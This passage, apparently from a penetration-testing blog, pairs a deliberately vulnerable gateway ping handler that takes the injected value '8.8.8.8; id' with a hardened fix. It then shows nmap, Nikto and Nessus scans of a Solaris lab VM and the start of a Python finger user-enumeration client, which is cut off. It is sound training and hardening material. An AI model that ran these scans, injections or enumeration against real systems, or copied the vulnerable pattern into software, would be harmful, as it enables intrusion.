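As an added example of the first two items in the list (this is not code from the original post or from any vendor's product, and all the names are made up for illustration), here is a hypothetical "ping diagnostics" handler of the kind most gateway admin UIs expose, first in the vulnerable shape and then hardened. The commands are returned rather than executed so the example is safe to run anywhere.<br />

```python
"""Hypothetical gateway-UI 'ping diagnostics' handler, vulnerable vs hardened.

Added example; request/session objects and handler names are invented for
illustration and belong to no real product. Commands are returned rather
than executed so the example is safe to run anywhere.
"""
import hmac
import html
import ipaddress
import re
import secrets


def make_request(method, params, cookies=None):
    """A request as a plain dict (constructed sample data, no web framework)."""
    return {"method": method, "params": params, "cookies": cookies or {}}


# ---- vulnerable shape -----------------------------------------------------
def vulnerable_ping_command(request):
    """The shell string a vulnerable handler would hand to os.system().

    Two bugs common in gateway UIs: the 'host' parameter is concatenated
    straight into a shell command (command injection: '8.8.8.8; id' runs
    'id' as the web-server user, often root on an appliance), and the action
    is a GET on a predictable URL with no anti-CSRF token, so any page a
    logged-in admin visits can trigger it.
    """
    return "ping -c 1 " + request["params"].get("host", "")


def vulnerable_render(request):
    """Echoes the parameter unescaped into the response: reflected XSS."""
    return "<p>Pinging " + request["params"].get("host", "") + "</p>"


# ---- hardened shape -------------------------------------------------------
HOSTNAME_RE = re.compile(
    r"^(?=.{1,253}$)[A-Za-z0-9](?:[A-Za-z0-9-]{0,61}[A-Za-z0-9])?"
    r"(?:\.[A-Za-z0-9](?:[A-Za-z0-9-]{0,61}[A-Za-z0-9])?)*$")


def validate_target(host):
    """Allow an IP literal or a DNS hostname; reject everything else."""
    try:
        return str(ipaddress.ip_address(host))
    except ValueError:
        pass
    if HOSTNAME_RE.match(host):
        return host
    raise ValueError("invalid target: %r" % host)


def new_csrf_token():
    """Per-session random token, stored server-side and embedded in the form."""
    return secrets.token_urlsafe(32)


def hardened_ping_command(request, session_csrf_token):
    """The argv list a hardened handler passes to subprocess.run() (no shell).

    Side-effecting actions only via POST; the anti-CSRF token is compared in
    constant time; the target is validated against an allowlist pattern and
    passed as its own argv element, so shell metacharacters are never parsed.
    """
    if request["method"] != "POST":
        raise PermissionError("method not allowed")
    submitted = request["params"].get("csrf_token", "")
    if not hmac.compare_digest(submitted.encode(), session_csrf_token.encode()):
        raise PermissionError("CSRF token missing or wrong")
    host = validate_target(request["params"].get("host", ""))
    return ["ping", "-c", "1", host]


def hardened_render(request):
    """html.escape() neutralises the reflected XSS when echoing the parameter."""
    return "<p>Pinging " + html.escape(request["params"].get("host", "")) + "</p>"


if __name__ == "__main__":
    token = new_csrf_token()
    evil = make_request("GET", {"host": "8.8.8.8; id"})
    print("vulnerable would run:", vulnerable_ping_command(evil))
    good = make_request("POST", {"host": "8.8.8.8", "csrf_token": token})
    print("hardened runs:", hardened_ping_command(good, token))
    for bad in (evil, make_request("POST", {"host": "8.8.8.8; id", "csrf_token": token})):
        try:
            hardened_ping_command(bad, token)
        except (PermissionError, ValueError) as err:
            print("rejected:", err)
```

The hardened version fixes the bugs in the order an attacker would hit them: method and token first (so the request cannot be forged from another origin), then input validation, then a no-shell invocation so that even a validation gap cannot turn into command execution.<br />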
I am currently working to complete a white-paper detailing some of the common findings, and I have recently been informed that I have been accepted to speak at Blackhat Europe on this subject. I will release the white-paper at Blackhat, so more information to come...<br />
<br />
<br />
<div class="separator" style="clear: both; text-align: center;"><img border="0" height="332" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEg2kLz1EcdwaJAcKH3N_TaXOpfDSbd-pV8V9jCc4ADCSpEf_6rc713_ahGcc8Ppy323SUsfPjoo2yifnXtVYS0YWXzyq3W22DWKVUM_RYejxkX1JMSOI5bDgCU_UQA2AKrvST5ACu7ce9c/s400/bh12eu_336x280.png" width="400" /></div><div class="separator" style="clear: both; text-align: center;"><br />
</div><div class="separator" style="clear: both; text-align: center;"><a href="http://www.blackhat.com/html/bh-eu-12/bh-eu-12-briefings.html#williams">http://www.blackhat.com/html/bh-eu-12/bh-eu-12-briefings.html#williams</a></div><div class="separator" style="clear: both; text-align: center;"><br />
</div>... and if you are going to Blackhat Europe, I might see you there!<br />
<br />
Posted by <a href="http://www.blogger.com/profile/12120787183871800863">Ben</a>, 2011-09-03<br />
<b>Practicing scanning and basic enumeration skills with a Solaris VM</b><br />
<br />
I'm pretty comfortable hacking around with Linux, Windows and Macs, but one of the platforms I have not used much (so far) is Solaris.<br />
<br />
I love learning new things, so this seemed like a gap worth filling, especially as I am looking to take the Check CRT certification (in which Solaris/Oracle are a small part of the syllabus).<br />
<br />
I had a bit of a play with <a href="http://hub.opensolaris.org/bin/view/Main/downloads">OpenSolaris</a> a while back, which gave me a flavor of some of the differences between Linux and Solaris (incidentally, the OpenSolaris project seems to have stalled or be ending).<br />
<br />
Anyway, I thought I would download the Solaris/Oracle VMs from the following location and have a play (starting with some basic scanning):<br />
<br />
<a href="http://www.oracle.com/technetwork/server-storage/solaris/solaris-vm-405695.html">http://www.oracle.com/technetwork/server-storage/solaris/solaris-vm-405695.html</a><br />
<br />
(You need to register with Oracle to download these images)<br />
<br />
<br />
<b>Setting up a Solaris box</b><br />
<br />
Once the Solaris10_9-10_VM.zip image is downloaded, unpack it with:<br />
<br />
<span class="Apple-style-span" style="font-family: 'Courier New', Courier, monospace;">unzip Solaris10_9-10_VM.zip</span><br />
<br />
Start VirtualBox, and import the appliance with:<br />
<br />
File > Import > select the *.ovf file (and follow the rest of the menu)<br />
<br />
Once this is imported you can start the VM and you will get to the following Solaris setup menu.<br />
<br />
<br />
<div class="separator" style="clear: both; text-align: center;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiI2ogJvzl6m6mRBTwob1HXl-DZHMWjoLKX68lYEtICx-QY8yaem90xNcwjpcfGx2CODYB4_E2nqCztSBIW3XhSDLJo1tQsTDF8shCE0OPwuhbZwoY9q9lXU84hEu06dzNYkWil_B2xnuo/s1600/solaris1.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="260" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiI2ogJvzl6m6mRBTwob1HXl-DZHMWjoLKX68lYEtICx-QY8yaem90xNcwjpcfGx2CODYB4_E2nqCztSBIW3XhSDLJo1tQsTDF8shCE0OPwuhbZwoY9q9lXU84hEu06dzNYkWil_B2xnuo/s400/solaris1.png" width="400" /></a></div><div style="text-align: center;">(Use F2 and F4 to continue through the menus)</div><br />
Work through these menus, and in around 20 minutes you will be able to login, and will have a working Solaris system:<br />
<div class="separator" style="clear: both; text-align: center;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEj22koh8KQKejUcM1A6LeqhkrftVDRfoKf4luKTaN02gebMT2UxhpK2rB56rhtdFqNagslHENdQRoLvPrMsWbqwfQhrRHbWmPqqirwVB_5eIXUPYq9NKyAhSgp9s_dNAlXPFVY-3cmwpus/s1600/solaris3.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="326" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEj22koh8KQKejUcM1A6LeqhkrftVDRfoKf4luKTaN02gebMT2UxhpK2rB56rhtdFqNagslHENdQRoLvPrMsWbqwfQhrRHbWmPqqirwVB_5eIXUPYq9NKyAhSgp9s_dNAlXPFVY-3cmwpus/s400/solaris3.png" width="400" /></a></div><div style="text-align: center;">(Mmmm... lovely; dull grey and purple)</div><br />
<br />
<b>Managing services</b><br />
<br />
Solaris 10 services are managed through SMF (the Service Management Facility) with the "svcadm" tool, rather than the init scripts used by most Linux distributions of the time; "svcs" lists service state.<br />
So, to set up some extra services and then scan the system:<br />
<br />
To set up an apache webserver:<br />
<br />
<span class="Apple-style-span" style="font-family: 'Courier New', Courier, monospace;">cd /etc/apache2</span><br />
<span class="Apple-style-span" style="font-family: 'Courier New', Courier, monospace;">cp httpd.conf-example httpd.conf</span><br />
<br />
<span class="Apple-style-span" style="font-family: 'Courier New', Courier, monospace;">svcadm -v enable /network/http:apache2</span><br />
<br />
.. and check it's running:<br />
<br />
<span class="Apple-style-span" style="font-family: 'Courier New', Courier, monospace;">svcs -p /network/http:apache2</span><br />
<span class="Apple-style-span" style="font-family: 'Courier New', Courier, monospace;">STATE STIME FMRI</span><br />
<span class="Apple-style-span" style="font-family: 'Courier New', Courier, monospace;">online 10:51:52 svc:/network/http:apache2</span><br />
<span class="Apple-style-span" style="font-family: 'Courier New', Courier, monospace;"> 10:51:52 1991 httpd</span><br />
<span class="Apple-style-span" style="font-family: 'Courier New', Courier, monospace;"> 10:51:53 1992 httpd</span><br />
<span class="Apple-style-span" style="font-family: 'Courier New', Courier, monospace;"> 10:51:53 1993 httpd</span><br />
<span class="Apple-style-span" style="font-family: 'Courier New', Courier, monospace;"> 10:51:53 1994 httpd</span><br />
<span class="Apple-style-span" style="font-family: 'Courier New', Courier, monospace;"> 10:51:53 1995 httpd</span><br />
<span class="Apple-style-span" style="font-family: 'Courier New', Courier, monospace;"> 10:51:53 1996 httpd</span><br />
<br />
Let's also start some other (unnecessary and potentially insecure) services, to expand our target a bit:<br />
<br />
<span class="Apple-style-span" style="font-family: 'Courier New', Courier, monospace;">svcadm enable network/telnet</span><br />
<span class="Apple-style-span" style="font-family: 'Courier New', Courier, monospace;">svcadm enable network/ftp</span><br />
<span class="Apple-style-span" style="font-family: 'Courier New', Courier, monospace;">svcadm enable network/finger</span><br />
<br />
<br />
<b>Scanning with nmap</b><br />
<br />
First lets try a basic scan:<br />
<br />
<br />
<span class="Apple-style-span" style="font-family: 'Courier New', Courier, monospace; font-size: x-small;">nmap 192.168.1.69</span><br />
<span class="Apple-style-span" style="font-family: 'Courier New', Courier, monospace; font-size: x-small;"><br />
</span><br />
<span class="Apple-style-span" style="font-family: 'Courier New', Courier, monospace; font-size: x-small;">Starting Nmap 5.59BETA1 ( http://nmap.org ) at 2011-08-29 19:28 BST</span><br />
<span class="Apple-style-span" style="font-family: 'Courier New', Courier, monospace; font-size: x-small;">Nmap scan report for 192.168.1.69</span><br />
<span class="Apple-style-span" style="font-family: 'Courier New', Courier, monospace; font-size: x-small;">Host is up (0.00052s latency).</span><br />
<span class="Apple-style-span" style="font-family: 'Courier New', Courier, monospace; font-size: x-small;">Not shown: 994 closed ports</span><br />
<span class="Apple-style-span" style="font-family: 'Courier New', Courier, monospace; font-size: x-small;">PORT STATE SERVICE</span><br />
<span class="Apple-style-span" style="font-family: 'Courier New', Courier, monospace; font-size: x-small;">21/tcp open ftp</span><br />
<span class="Apple-style-span" style="font-family: 'Courier New', Courier, monospace; font-size: x-small;">22/tcp open ssh</span><br />
<span class="Apple-style-span" style="font-family: 'Courier New', Courier, monospace; font-size: x-small;">23/tcp open telnet</span><br />
<span class="Apple-style-span" style="font-family: 'Courier New', Courier, monospace; font-size: x-small;">79/tcp open finger</span><br />
<span class="Apple-style-span" style="font-family: 'Courier New', Courier, monospace; font-size: x-small;">80/tcp open http</span><br />
<span class="Apple-style-span" style="font-family: 'Courier New', Courier, monospace; font-size: x-small;">111/tcp open rpcbind</span><br />
<span class="Apple-style-span" style="font-family: 'Courier New', Courier, monospace; font-size: x-small;">MAC Address: 08:00:27:33:49:19 (Cadmus Computer Systems)</span><br />
<span class="Apple-style-span" style="font-family: 'Courier New', Courier, monospace; font-size: x-small;"><br />
</span><br />
<span class="Apple-style-span" style="font-family: 'Courier New', Courier, monospace; font-size: x-small;">Nmap done: 1 IP address (1 host up) scanned in 27.71 seconds</span><br />
<br />
<br />
So we can see the services I added, and it looks like ssh (and rpcbind) were enabled by default.<br />
<br />
Now for a more thorough scan, running every NSE script (note that --script all includes brute-force and intrusive scripts, so this is only appropriate in a lab):<br />
<br />
<br />
<span class="Apple-style-span" style="font-family: 'Courier New', Courier, monospace; font-size: x-small;">nmap --script all 192.168.1.69</span><br />
<span class="Apple-style-span" style="font-family: 'Courier New', Courier, monospace; font-size: x-small;"><br />
</span><br />
<span class="Apple-style-span" style="font-family: 'Courier New', Courier, monospace; font-size: x-small;">Starting Nmap 5.59BETA1 ( http://nmap.org ) at 2011-08-29 19:23 BST</span><br />
<span class="Apple-style-span" style="font-family: 'Courier New', Courier, monospace;"><span class="Apple-style-span" style="font-size: x-small;">Nmap scan report for 192.168.1.69</span></span><br />
<span class="Apple-style-span" style="font-family: 'Courier New', Courier, monospace; font-size: x-small;">Host is up (0.0010s latency).</span><br />
<span class="Apple-style-span" style="font-family: 'Courier New', Courier, monospace; font-size: x-small;">Not shown: 994 closed ports</span><br />
<span class="Apple-style-span" style="font-family: 'Courier New', Courier, monospace; font-size: x-small;">PORT STATE SERVICE</span><br />
<span class="Apple-style-span" style="font-family: 'Courier New', Courier, monospace; font-size: x-small;">21/tcp open ftp</span><br />
<span class="Apple-style-span" style="font-family: 'Courier New', Courier, monospace; font-size: x-small;">|_ftp-bounce: no banner</span><br />
<span class="Apple-style-span" style="color: #cc0000; font-family: 'Courier New', Courier, monospace; font-size: x-small;">22/tcp open ssh</span><br />
<span class="Apple-style-span" style="color: #cc0000; font-family: 'Courier New', Courier, monospace; font-size: x-small;">|_banner: SSH-2.0-Sun_SSH_1.1.3</span><br />
<span class="Apple-style-span" style="font-family: 'Courier New', Courier, monospace; font-size: x-small;">| ssh-hostkey: 1024 78:af:4e:c7:67:0e:18:9b:da:77:c4:6d:c0:a7:1b:7d (DSA)</span><br />
<span class="Apple-style-span" style="font-family: 'Courier New', Courier, monospace; font-size: x-small;">|_1024 a5:92:ed:16:f5:fc:26:8b:18:d4:5e:b5:9d:0c:21:3b (RSA)</span><br />
<span class="Apple-style-span" style="font-family: 'Courier New', Courier, monospace; font-size: x-small;">23/tcp open telnet</span><br />
<span class="Apple-style-span" style="font-family: 'Courier New', Courier, monospace; font-size: x-small;">79/tcp open finger</span><br />
<span class="Apple-style-span" style="font-family: 'Courier New', Courier, monospace; font-size: x-small;">80/tcp open http</span><br />
<span class="Apple-style-span" style="font-family: 'Courier New', Courier, monospace; font-size: x-small;">| http-brute: </span><br />
<span class="Apple-style-span" style="font-family: 'Courier New', Courier, monospace; font-size: x-small;">|_ ERROR: No path was specified (see http-brute.path)</span><br />
<span class="Apple-style-span" style="font-family: 'Courier New', Courier, monospace; font-size: x-small;">|_citrix-brute-xml: FAILED: No domain specified (use ntdomain argument)</span><br />
<span class="Apple-style-span" style="color: #cc0000; font-family: 'Courier New', Courier, monospace; font-size: x-small;">| http-methods: Potentially risky methods: TRACE</span><br />
<span class="Apple-style-span" style="color: #cc0000; font-family: 'Courier New', Courier, monospace; font-size: x-small;">|_See http://nmap.org/nsedoc/scripts/http-methods.html</span><br />
<span class="Apple-style-span" style="color: #cc0000; font-family: 'Courier New', Courier, monospace; font-size: x-small;">|_http-trace: TRACE is enabled</span><br />
<span class="Apple-style-span" style="font-family: 'Courier New', Courier, monospace; font-size: x-small;">|_http-date: Mon, 29 Aug 2011 18:24:32 GMT; +1s from local time.</span><br />
<span class="Apple-style-span" style="font-family: 'Courier New', Courier, monospace; font-size: x-small;">| http-headers: </span><br />
<span class="Apple-style-span" style="font-family: 'Courier New', Courier, monospace; font-size: x-small;">| Date: Mon, 29 Aug 2011 18:24:34 GMT</span><br />
<span class="Apple-style-span" style="font-family: 'Courier New', Courier, monospace; font-size: x-small;">| Server: Apache/2.0.63 (Unix) DAV/2</span><br />
<span class="Apple-style-span" style="font-family: 'Courier New', Courier, monospace; font-size: x-small;">| Content-Location: index.html.en</span><br />
<span class="Apple-style-span" style="font-family: 'Courier New', Courier, monospace; font-size: x-small;">| Vary: negotiate,accept-language,accept-charset</span><br />
<span class="Apple-style-span" style="font-family: 'Courier New', Courier, monospace; font-size: x-small;">| TCN: choice</span><br />
<span class="Apple-style-span" style="font-family: 'Courier New', Courier, monospace; font-size: x-small;">| Last-Modified: Sun, 21 Nov 2004 14:35:21 GMT</span><br />
<span class="Apple-style-span" style="font-family: 'Courier New', Courier, monospace; font-size: x-small;">| ETag: "4614-5b0-a64a7c40;462a-961-a64a7c40"</span><br />
<span class="Apple-style-span" style="font-family: 'Courier New', Courier, monospace; font-size: x-small;">| Accept-Ranges: bytes</span><br />
<span class="Apple-style-span" style="font-family: 'Courier New', Courier, monospace; font-size: x-small;">| Content-Length: 1456</span><br />
<span class="Apple-style-span" style="font-family: 'Courier New', Courier, monospace; font-size: x-small;">| Connection: close</span><br />
<span class="Apple-style-span" style="font-family: 'Courier New', Courier, monospace; font-size: x-small;">| Content-Type: text/html</span><br />
<span class="Apple-style-span" style="font-family: 'Courier New', Courier, monospace; font-size: x-small;">| Content-Language: en</span><br />
<span class="Apple-style-span" style="font-family: 'Courier New', Courier, monospace; font-size: x-small;">| </span><br />
<span class="Apple-style-span" style="font-family: 'Courier New', Courier, monospace; font-size: x-small;">|_ (Request type: HEAD)</span><br />
<span class="Apple-style-span" style="font-family: 'Courier New', Courier, monospace; font-size: x-small;">| http-form-brute: </span><br />
<span class="Apple-style-span" style="font-family: 'Courier New', Courier, monospace; font-size: x-small;">|_ ERROR: No passvar was specified (see http-form-brute.passvar)</span><br />
<span class="Apple-style-span" style="font-family: 'Courier New', Courier, monospace; font-size: x-small;">|_http-title: Test Page for Apache Installation</span><br />
<span class="Apple-style-span" style="font-family: 'Courier New', Courier, monospace; font-size: x-small;">|_http-wp-plugins: nothing found amongst the 100 most popular plugins, use --script-arg http-wp-plugins.search=&lt;number|all&gt; for deeper analysis)</span><br />
<span class="Apple-style-span" style="font-family: 'Courier New', Courier, monospace; font-size: x-small;">| http-domino-enum-passwords: </span><br />
<span class="Apple-style-span" style="font-family: 'Courier New', Courier, monospace; font-size: x-small;">|_ ERROR: No valid credentials were found (see domino-enum-passwords.username and domino-enum-passwords.password)</span><br />
<span class="Apple-style-span" style="font-family: 'Courier New', Courier, monospace; font-size: x-small;">111/tcp open rpcbind</span><br />
<span class="Apple-style-span" style="font-family: 'Courier New', Courier, monospace; font-size: x-small;">MAC Address: 08:00:27:33:49:19 (Cadmus Computer Systems)</span><br />
<span class="Apple-style-span" style="font-family: 'Courier New', Courier, monospace; font-size: x-small;"><br />
</span><br />
<span class="Apple-style-span" style="font-family: 'Courier New', Courier, monospace; font-size: x-small;">Host script results:</span><br />
<span class="Apple-style-span" style="font-family: 'Courier New', Courier, monospace; font-size: x-small;">|_dns-brute: Can't guess domain of "192.168.1.69"; use dns-brute.domain script argument.</span><br />
<span class="Apple-style-span" style="font-family: 'Courier New', Courier, monospace; font-size: x-small;">|_path-mtu: PMTU == 1500</span><br />
<span class="Apple-style-span" style="font-family: 'Courier New', Courier, monospace; font-size: x-small;">|_ipidseq: Unknown</span><br />
<span class="Apple-style-span" style="font-family: 'Courier New', Courier, monospace; font-size: x-small;">| qscan: </span><br />
<span class="Apple-style-span" style="font-family: 'Courier New', Courier, monospace; font-size: x-small;">| PORT FAMILY MEAN (us) STDDEV LOSS (%)</span><br />
<span class="Apple-style-span" style="font-family: 'Courier New', Courier, monospace; font-size: x-small;">| 1 0 732.20 508.23 0.0%</span><br />
<span class="Apple-style-span" style="font-family: 'Courier New', Courier, monospace; font-size: x-small;">| 21 0 1143.80 853.92 0.0%</span><br />
<span class="Apple-style-span" style="font-family: 'Courier New', Courier, monospace; font-size: x-small;">| 22 1 1236.80 734.74 0.0%</span><br />
<span class="Apple-style-span" style="font-family: 'Courier New', Courier, monospace; font-size: x-small;">| 23 1 1248.10 782.83 0.0%</span><br />
<span class="Apple-style-span" style="font-family: 'Courier New', Courier, monospace; font-size: x-small;">| 79 0 1065.30 794.20 0.0%</span><br />
<span class="Apple-style-span" style="font-family: 'Courier New', Courier, monospace; font-size: x-small;">| 80 1 1297.50 742.94 0.0%</span><br />
<span class="Apple-style-span" style="font-family: 'Courier New', Courier, monospace; font-size: x-small;">|_111 1 1577.30 1092.91 0.0%</span><br />
<span class="Apple-style-span" style="font-family: 'Courier New', Courier, monospace; font-size: x-small;"><br />
</span><br />
<span class="Apple-style-span" style="font-family: 'Courier New', Courier, monospace; font-size: x-small;">Nmap done: 1 IP address (1 host up) scanned in 118.38 seconds</span><br />
<br />
That didn't find a great deal extra, except that the HTTP TRACE method is enabled, which means that XST (cross-site tracing, a client-side attack that uses TRACE to read the cookies and other headers the browser sends) is potentially possible against old browser versions. Modern browsers block TRACE from script, so this is mostly a hardening finding now; it is fixed with "TraceEnable off" in httpd.conf.<br />
<br />
The SSH banner (Sun_SSH) also reveals that this is a Solaris system.<br />
<div><br />
</div><br />
<div><br />
</div><div><b>Scanning with Nikto</b><br />
<br />
We can scan the webserver with Nikto using the following command:</div><div><br />
</div><div><div><span class="Apple-style-span" style="font-family: 'Courier New', Courier, monospace; font-size: x-small;">./nikto.pl -host 192.168.1.69</span></div><div><span class="Apple-style-span" style="font-family: 'Courier New', Courier, monospace; font-size: x-small;">- Nikto v2.1.4 </span></div><div><span class="Apple-style-span" style="font-family: 'Courier New', Courier, monospace; font-size: x-small;">--------------------------------------------------------------------------- </span></div><div><span class="Apple-style-span" style="font-family: 'Courier New', Courier, monospace; font-size: x-small;">+ Target IP: 192.168.1.69 </span></div><div><span class="Apple-style-span" style="font-family: 'Courier New', Courier, monospace; font-size: x-small;">+ Target Hostname: 192.168.1.69 </span></div><div><span class="Apple-style-span" style="font-family: 'Courier New', Courier, monospace; font-size: x-small;">+ Target Port: 80 </span></div><div><span class="Apple-style-span" style="font-family: 'Courier New', Courier, monospace; font-size: x-small;">+ Start Time: 2011-08-30 19:59:48 </span></div><div><span class="Apple-style-span" style="font-family: 'Courier New', Courier, monospace; font-size: x-small;">--------------------------------------------------------------------------- </span></div><div><span class="Apple-style-span" style="font-family: 'Courier New', Courier, monospace; font-size: x-small;">+ Server: Apache/2.0.63 (Unix) DAV/2 </span></div><div><span class="Apple-style-span" style="font-family: 'Courier New', Courier, monospace; font-size: x-small;"><span class="Apple-style-span" style="color: #cc0000;">+ Apache/2.0.63 appears to be outdated (current is at least Apache/2.2.17). Apache 1.3.42 (final release) and 2.0.64 are also current. 
</span> </span></div><div><span class="Apple-style-span" style="font-family: 'Courier New', Courier, monospace; font-size: x-small;">+ Allowed HTTP Methods: GET, HEAD, POST, OPTIONS, TRACE </span></div><div><span class="Apple-style-span" style="font-family: 'Courier New', Courier, monospace; font-size: x-small;">+ OSVDB-877: HTTP TRACE method is active, suggesting the host is vulnerable to XST </span></div><div><span class="Apple-style-span" style="color: #cc0000; font-family: 'Courier New', Courier, monospace; font-size: x-small;">+ OSVDB-2117: /: Appears to be a default Apache install. </span></div><div><span class="Apple-style-span" style="color: #cc0000; font-family: 'Courier New', Courier, monospace; font-size: x-small;">+ OSVDB-3092: /manual/: Web server manual found. </span></div><div><span class="Apple-style-span" style="color: #cc0000; font-family: 'Courier New', Courier, monospace; font-size: x-small;">+ OSVDB-3233: /index.html.ca: Apache default foreign language file found. All default files should be removed from the web server as they may give an attacker additional system information.</span></div><div><span class="Apple-style-span" style="color: #cc0000; font-family: 'Courier New', Courier, monospace; font-size: x-small;">... etc ...</span><br />
<span class="Apple-style-span" style="color: #cc0000; font-family: 'Courier New', Courier, monospace; font-size: x-small;"><br />
</span></div><div><span class="Apple-style-span" style="color: #cc0000; font-family: 'Courier New', Courier, monospace; font-size: x-small;">+ OSVDB-3233: /index.html.var: Apache default foreign language file found. All default files should be removed from the web server as they may give an attacker additional system information.</span></div><div><span class="Apple-style-span" style="color: #cc0000; font-family: 'Courier New', Courier, monospace; font-size: x-small;">+ OSVDB-3233: /cgi-bin/printenv: Apache 2.0 default script is executable and gives server environment variables. All default scripts should be removed. It may also allow XSS types of attacks. http://www.securityfocus.com/bid/4431.</span></div><div><span class="Apple-style-span" style="color: #cc0000; font-family: 'Courier New', Courier, monospace; font-size: x-small;">+ OSVDB-3233: /cgi-bin/test-cgi: Apache 2.0 default script is executable and reveals system information. All default scripts should be removed.</span></div><div><span class="Apple-style-span" style="color: #cc0000; font-family: 'Courier New', Courier, monospace; font-size: x-small;">+ OSVDB-3268: /icons/: Directory indexing found.</span></div><div><span class="Apple-style-span" style="color: #cc0000; font-family: 'Courier New', Courier, monospace; font-size: x-small;">+ OSVDB-3268: /manual/images/: Directory indexing found.</span></div><div><span class="Apple-style-span" style="color: #cc0000; font-family: 'Courier New', Courier, monospace; font-size: x-small;">+ OSVDB-3233: /icons/README: Apache default file found.</span></div><div><span class="Apple-style-span" style="font-family: 'Courier New', Courier, monospace; font-size: x-small;">+ 6448 items checked: 2 error(s) and 36 item(s) reported on remote host</span></div><div><span class="Apple-style-span" style="font-family: 'Courier New', Courier, monospace; font-size: x-small;">+ End Time: 2011-08-30 20:01:05 (77 seconds)</span></div><div><span class="Apple-style-span" 
style="font-family: 'Courier New', Courier, monospace; font-size: x-small;">---------------------------------------------------------------------------</span></div><div><span class="Apple-style-span" style="font-family: 'Courier New', Courier, monospace; font-size: x-small;">+ 1 host(s) tested</span></div></div><div><br />
</div><div>As you can see, there is various default content from my Apache install (the manual, the sample CGI scripts, the default language pages and the directory indexes). All of this should be removed from a production web server, as it gives attackers extra information: /cgi-bin/printenv and /cgi-bin/test-cgi in particular leak server environment details. Additionally, we can see that this is an old version of Apache (2.0.63).</div><br />
<br />
<br />
<b>Scanning with Nessus</b><br />
<br />
Now for a Nessus scan, to see what that finds:<br />
<br />
<div class="separator" style="clear: both; text-align: center;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEioerUIjMRoWK4UahN_stqZdMCSNagybYWsx1uJGwTEPoPzvjZvp_Wdc6oycN7ZoRB4yjyPLzJ7i_XItWLVD8H3daZ-fuY3NviiISknJKXMckXnLTMA1lHYcVS4r7Rl_mKXqqEe9dGneWE/s1600/solaris-nessus.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="300" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEioerUIjMRoWK4UahN_stqZdMCSNagybYWsx1uJGwTEPoPzvjZvp_Wdc6oycN7ZoRB4yjyPLzJ7i_XItWLVD8H3daZ-fuY3NviiISknJKXMckXnLTMA1lHYcVS4r7Rl_mKXqqEe9dGneWE/s400/solaris-nessus.png" width="400" /></a></div><br />
In the Nessus report, there is a "High Severity" Denial of Service vulnerability for Apache.<br />
<br />
This is the Apache byte-range (Range header) DoS disclosed in August 2011, the same issue as in the Range DoS write-up above, and many sites and services are currently vulnerable to it. More information on this vulnerability is available at the following location:<br />
<br />
<a href="http://archives.neohapsis.com/archives/fulldisclosure/2011-08/0203.html">http://archives.neohapsis.com/archives/fulldisclosure/2011-08/0203.html</a><br />
<br />
Also, there are various information disclosure issues from the other running services (FTP, Telnet, Finger, SSH) which give us OS and service versions, and username information.<br />
<br />
<br />
<b>Finger and fingerd enumeration with a basic "for" loop</b><br />
<br />
Nobody installs fingerd these days if they want to be secure (but hey, I'm trying to make the target bigger and practice some enumeration).<br />
<br />
Nessus found the user root using finger, but it is also possible to find other accounts. This version of the finger daemon searches the user description (the GECOS field) in addition to the username, so you can also find users via words in their description.<br />
<br />
Here is how to install the finger client on Backtrack and run a couple of different queries:<br />
<br />
<span class="Apple-style-span" style="font-family: 'Courier New', Courier, monospace;">apt-get install finger</span><br />
<span class="Apple-style-span" style="font-family: 'Courier New', Courier, monospace;"><br />
</span><br />
<span class="Apple-style-span" style="font-family: 'Courier New', Courier, monospace;">finger root@192.168.1.69</span><br />
<span class="Apple-style-span" style="font-family: 'Courier New', Courier, monospace;">[192.168.1.69]</span><br />
<span class="Apple-style-span" style="font-family: 'Courier New', Courier, monospace;">Login Name TTY Idle When Where</span><br />
<span class="Apple-style-span" style="font-family: 'Courier New', Courier, monospace;">root Super-User console 2 Mon 07:55 :0 </span><br />
<span class="Apple-style-span" style="font-family: 'Courier New', Courier, monospace;">root Super-User pts/3 2 Mon 08:29 :0.0 </span><br />
<br />
<span class="Apple-style-span" style="font-family: 'Courier New', Courier, monospace;">finger user@192.168.1.69</span><br />
<div><span class="Apple-style-span" style="font-family: 'Courier New', Courier, monospace;">[192.168.1.69]</span></div><br />
<span class="Apple-style-span" style="font-family: 'Courier New', Courier, monospace;">Login Name TTY Idle When Where</span><br />
<span class="Apple-style-span" style="font-family: 'Courier New', Courier, monospace;">nobody NFS Anonymous Access < . . . . ></span><br />
<span class="Apple-style-span" style="font-family: 'Courier New', Courier, monospace;">noaccess No Access User < . . . . ></span><br />
<span class="Apple-style-span" style="font-family: 'Courier New', Courier, monospace;">nobody4 SunOS 4.x NFS Anonym < . . . . ></span><br />
<span class="Apple-style-span" style="font-family: 'Courier New', Courier, monospace;"><br />
</span><br />
So, if there were other users on the system, we could try a dictionary attack to find them using finger in a "for" loop.<br />
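As an added example (not from the original post), here is the same dictionary attack as a small stand-alone finger client, which is useful when the finger binary isn't installed or you want to script around odd replies. It speaks the protocol directly (RFC 1288: connect to TCP/79, send the name followed by CRLF, read until the server closes) and parses the Solaris reply format shown above. The <span style="font-family: 'Courier New', Courier, monospace;">[192.168.1.69]</span> line in the output above is printed by the finger client program, not sent by the server, so it does not appear here; the default host is the lab VM from this post.<br />

```python
"""Dictionary-based user enumeration over the finger protocol (RFC 1288).

Added example, not from the original post: a minimal finger client that
speaks the protocol directly (TCP/79, query + CRLF, read to EOF) and parses
the Solaris listing format. 192.168.1.69 is the lab VM from this post.
"""
import socket

HEADER_PREFIX = "Login"   # first line of a Solaris finger listing
NOT_FOUND_MARK = "???"    # Solaris answers 'In real life: ???' for unknown names


def finger_query(host, name, port=79, timeout=5):
    """Send one finger request and return the raw reply as text."""
    with socket.create_connection((host, port), timeout=timeout) as s:
        s.sendall((name + "\r\n").encode("ascii"))
        chunks = []
        while True:
            data = s.recv(4096)
            if not data:
                break
            chunks.append(data)
    return b"".join(chunks).decode("latin-1")


def parse_logins(reply):
    """Extract login names from a Solaris-style finger listing.

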